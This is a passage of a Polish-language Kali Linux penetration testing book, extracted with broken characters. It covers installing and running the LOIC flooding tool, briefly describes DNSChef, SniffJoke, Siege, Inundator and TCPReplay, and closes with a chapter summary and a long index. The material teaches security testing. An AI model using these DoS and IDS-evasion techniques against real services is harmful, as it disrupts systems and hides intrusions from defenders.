Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 23: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

